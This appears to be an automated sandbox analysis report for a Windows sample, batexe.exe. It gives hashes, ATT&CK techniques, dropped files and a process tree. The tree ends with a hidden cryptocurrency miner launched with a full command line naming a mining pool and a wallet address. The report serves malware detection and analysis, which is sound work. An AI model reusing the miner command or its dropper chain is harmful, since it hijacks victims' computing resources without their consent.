73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20240220-ja
resource tags

arch:x64arch:x86image:win10v2004-20240220-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
21/02/2024, 04:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1888637039-960448630-940472005-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1888637039-960448630-940472005-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1604	b2e.exe
4932	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4932	cpuminer-sse2.exe
4932	cpuminer-sse2.exe
4932	cpuminer-sse2.exe
4932	cpuminer-sse2.exe
4932	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1000-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1000 wrote to memory of 1604	1000	batexe.exe	86
PID 1000 wrote to memory of 1604	1000	batexe.exe	86
PID 1000 wrote to memory of 1604	1000	batexe.exe	86
PID 1604 wrote to memory of 3932	1604	b2e.exe	88
PID 1604 wrote to memory of 3932	1604	b2e.exe	88
PID 1604 wrote to memory of 3932	1604	b2e.exe	88
PID 3932 wrote to memory of 4932	3932	cmd.exe	90
PID 3932 wrote to memory of 4932	3932	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1000
- C:\Users\Admin\AppData\Local\Temp\6438.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6438.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6438.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66E8.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3932
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6438.tmp\b2e.exe

Filesize
4.4MB

MD5
e5709ee4ed3357d395d0d3aa26c45233

SHA1
ce08ad0633e3d2422772b00af22fbbd98af6ce2a

SHA256
3c2ad8442c17fe8d700a545c244e563daa88c03514224cbf42fed7401c28cc0a

SHA512
e261de3775a7d6c2b9fa614220f03fed97cd11235f6e9d63c6a2eea203e3f4dc8f755177796aa9979e744b7b30fe15eeeac587f94757f851edc214e9cc8c265b

Download Submit
C:\Users\Admin\AppData\Local\Temp\6438.tmp\b2e.exe

Filesize
2.0MB

MD5
c80432ff2ddc9324a60903e1f256891f

SHA1
4959e9b6355ee8494f2f25c54aac2e88bf7648c3

SHA256
0db1df91e958f3d2a3eb2222a28a0f82f60c2428b6c6c4e485d38b8fefd3ff0b

SHA512
a6f6a6b704f33e7dad27a1e09fc5611b89a70528e458236bbb058d1f76d2e3ceb02a1c727b70748c6f8819347d1a874746720f05363e42e49d686192b17c370f

Download Submit
C:\Users\Admin\AppData\Local\Temp\6438.tmp\b2e.exe

Filesize
1.7MB

MD5
a44eff551358dfc45c04729e71fccc9a

SHA1
4190c4813964e6c73f76acda5cbc0ae245a7f66a

SHA256
d2d6bfe138a13e97e2554a2d41ca9e109b56004b2786d29cef7ebff3fad8d10b

SHA512
82d219e6a60e802b35e8838779a0187e4d59f0e698209989f3efee0cac971cfaed3c74dd424ae36f2a2f473b6d252bd600ac2cf16f5662438247df3c651acbad

Download Submit
C:\Users\Admin\AppData\Local\Temp\66E8.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
304KB

MD5
21ee216eb3abcb38feb819d0b9ab5f69

SHA1
d885ad789b2fca1382add60030582d2fa82aa655

SHA256
5eadd1a58fba7af956c61f7d96d7aafbb80dfd70f034ef5ab8dc4b1729f9b227

SHA512
e8ae37a48d9668a6ef1d8fd6eded9ae2ff26f5f43f234a31750bc1a20afdc96b283e90f4b009f2e9f2a3ce6b4dd9e51d514a04bab93a978b51d49afe7a0c0775

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
357KB

MD5
96eee095d6f3f7913e922a219be8fdab

SHA1
67ab4271ad7412ef91ea54e12d754904b7d76ab4

SHA256
049b8835f1dd05b79ce0f9b035eaf7f6b5e33beb3a11c1e20b28aa97ac12d568

SHA512
ba95c8fb647452c2219d72124467ce1cee381d8930139094a46c6b227f7cf4807910a0e19dfc2c8e171b3de6400de0f77b9641bd01fc9a2247d9af9579de7e48

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
389KB

MD5
dc19bdc8b9a2ac039fbdf1110b61d048

SHA1
a4e6ccc7cd2eb5b0a9a23e938fd54c173eb88c3a

SHA256
d4a2d2e33e28d61cd8e08927bb36c7e609001ecf87c0247eddaf519c803daa0e

SHA512
705d7f595bb42b9758c0c13b6133b961e621ecbe01ec0bbc76718712081348356f371c18c6ec79e07e3bf1170279c5ee6a1dc5874168c61380e634c6009de734

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
359KB

MD5
ee37151825f3badd0168b0c7ebb3496c

SHA1
4e72efa6d8abb6cb23423e038aba1aad0ecc4008

SHA256
650ec4c3207bf2ad2c50c1c57689636f41c68665e319e6415e8e0d7266bf68a4

SHA512
3d4914d8fd66041c8bedfdfc4b375a2638d34931ec70fad0383e3f6e2550b591fd9175080f18e7a2c3437f89f859e78453ebf550b5cf583ea5aaefa8658c82d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
365KB

MD5
51436e72cc5b6e7c81bd5078e05aeeea

SHA1
b1b0558c2ed29bf063d601767a19cb77ea8d691a

SHA256
f0bd9869a8e664f047b7f0cb36b7491f45ff62efd96c380a07255f5ef0f62f5e

SHA512
7dd0b4c9e9d17d47668161c01b8986104e5330a704263232cfdfab0607e9022bc8bcbca96a862fb6a7b02b59e062ca15e0e8b0059b46ab5a4757503c8fdc9b1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
667KB

MD5
6a3afb0e8a02774f9c6873d27a40eac2

SHA1
9aca9152f4b5a46fb0f7594150706b90a2d3bae3

SHA256
c3337e4e2ed8b6487bb4319093d7c85b2d23ccf3facb0d39e0c4dde7f0b03c65

SHA512
73a6e72ab8245e8f2a517967f0d1cd5ffd79529d9a22ff865b6a812f4939374ce102d23ea983360b3d1982fdbc4fdfc72a9f0b810d807c1fb56b1ea603c49728

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
311KB

MD5
fec402c90ae5204a92a5d1c46fe27004

SHA1
d66291cec23ecccb5706df1dd471f88006cadc36

SHA256
7f7bf7d5484026113579aedaeace90d1ff42471b1160414063ee2405b2a47955

SHA512
eb7f01ced734ec36edc2efd614b1af8a4f8e06f3698e0ed80e90c39b5ade84ad564dff8955395adbae0ed144ccd36515eb8ddd8d1169040cfabed0b5daa53d71

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
318KB

MD5
389bac59aa4ddad632b636cd2c98f5f4

SHA1
4f86f2434d3759cc686aacf2851d3dd49de6979d

SHA256
068f127a38677cf5fa2c4f5b12bca8cb3514361b80e02d41bd1cc1d7feb83c5a

SHA512
6fb367a7a76cb559354023cc6734c3676ca8b23e42fcd9199bc64fd02eec3952d2087e235249f14838e4ee70e182e8224166400a68bd4a53dc74eb8a2db513f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
243KB

MD5
43b4d7aebf1cdfad98cc76ac57fc376d

SHA1
021ebf69a729bbc3047c6f2285b37622d1847c33

SHA256
f026a066397ac09fb7436c87b1e1a756cd3cbc12414641d55106e7e7ceb720f1

SHA512
855cd038528fb5a3a5b99f9f135e4d262ff419a9d0f438835d7eb881da46df588acf9f333e8783adf46b8972c23d80bfcc672d0c69b1d1a98796c86c686906f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
447KB

MD5
bbb1f07caa4d3ed352ede757a364b476

SHA1
9106dffaaeb50fb4feb7078c4ad3d04c2f1f284b

SHA256
323de0ee187a3304dd8c4ad13bffc7f0471da4d33579fd14bbf960603146af16

SHA512
49eee07086ca521b9be214051a19e015c4ae660731ecded0127a09c435c97251e7fdaad74d4c8ba637ceb2f5d7532e17e644f4332b7efdd4ed97dd26a96a9118

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
304KB

MD5
aea38ff9d453dfdc2bd0091701892a8f

SHA1
84b91dccf347c7118b2140168a2f76e5e5f26bdb

SHA256
53f2f8605e684d320f6bae2bbe122231b8583c86ca2c16ba95786778992d2011

SHA512
4372b1bed859e180871b919e42f8b0d3c272d9ea14d0c094e0d5cdb61cbabd09bc0de486f711ac3b974502a66f6e830c5808987defaa4fce08c7e380b1af3444

Download Submit
memory/1000-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1604-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1604-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4932-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-47-0x0000000001100000-0x00000000029B5000-memory.dmp

Filesize
24.7MB

Download
memory/4932-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4932-46-0x00000000631A0000-0x0000000063238000-memory.dmp

Filesize
608KB

Download
memory/4932-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4932-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4932-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download